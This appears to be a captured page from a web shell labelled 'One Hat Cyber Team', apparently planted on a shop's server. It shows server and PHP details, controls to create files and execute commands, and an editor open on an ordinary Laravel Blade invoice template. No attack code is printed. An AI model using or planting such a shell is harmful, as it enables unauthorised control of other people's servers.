⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.155
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
barzah.shop
/
public_html
/
resources
/
views
/
pdf
/
Edit File: item.blade.php
{{ __('Invoice') }}
@php $font_family = 'DejaVu Sans, serif'; $color = '#333542'; $rtl = 'rtl'; $unicode_bidi = 'bidi-override'; $di_block = 'inline-block'; $w_60 = '60%'; $w_10 = '10%'; $w_30 = '30%'; $w_80 = '80%'; $w_20 = '20%'; $w_45 = '45%'; if (!is_null(getUserNullCheck())) { $keywords = App\Http\Helpers\Common::get_keywords($user->id); } @endphp
@if ($userBs->logo)
@else
@endif
{{ $keywords['INVOICE'] ?? __('INVOICE') }}
{{ $keywords['Payment Method'] ?? __('Payment Method') }}:
{{ $keywords[$order->method] ?? $order->method }}
{{ $keywords['Invoice No'] ?? __('Invoice No') }}:
#{{ $order->order_number }}
{{ $keywords['Date'] ?? __('Date') }}:
{{ \Illuminate\Support\Carbon::now()->format('jS, M Y') }}
{{ $keywords['Bill to'] ?? __('Bill to') }}:
{{ $keywords['Name'] ?? __('Name') }}:
{{ ucfirst($order->billing_fname) }} {{ ucfirst($order->billing_lname) }}
{{ $keywords['Address'] ?? __('Address') }}:
{{ $order->billing_address }}
{{ $keywords['City'] ?? __('City') }}:
{{ $order->billing_city }}, {{ $order->billing_state }}
{{ $keywords['Country'] ?? __('Country') }}:
{{ $order->billing_country }}
{{ $keywords['Email'] ?? __('Email') }}:
{{ $order->billing_email }}
{{ $keywords['Order Details'] ?? __('Order Details') }}:
@if (!is_null($order->discount))
{{ $keywords['Discount'] ?? __('Discount') }}:
{{ currencyTextPrice($order->currency_id, $order->discount) }}
@endif
{{ $keywords['Tax'] ?? __('Tax') }}:
{{ currencyTextPrice($order->currency_id, $order->tax) }}
{{ $keywords['Paid Amount'] ?? __('Paid Amount') }}:
{{ currencyTextPrice($order->currency_id, $order->total) }}
{{ $keywords['Payment Status'] ?? __('Payment Status') }}:
{{ $keywords[$order->payment_status] ?? $order->payment_status }}
{{ $keywords['Order Status'] ?? __('Order Status') }}:
{{ $keywords[ucfirst($order->order_status)] ?? ucfirst($order->order_status) }}
{{ $keywords['Title'] ?? __('Title') }}
{{ $keywords['Quantity'] ?? __('Quantity') }}
{{ $keywords['Price'] ?? __('Price') }}
@foreach ($order->orderitems as $item)
{{ $item->title }}
{{ $item->qty }}
{{ currencyTextPrice($order->currency_id, round($item->price, 2)) }}
@php $variations = json_decode($item->variations); @endphp @if (!is_null($variations)) @foreach ($variations as $k => $vitm) @php $name = isset($vitm->name) ? $vitm->name : ''; $key = is_string($k) ? $k : ''; @endphp
{{ $name }}
({{ $key }})
: {{ currencyTextPrice($order->currency_id, round($vitm->price, 2)) }}
@endforeach @endif
@endforeach
{{ $keywords['Thanks & Regards'] ?? __('Thanks & Regards') }},
@php $website_title = $user->shop_name ?? $user->username; @endphp
{{ $website_title }}
Simpan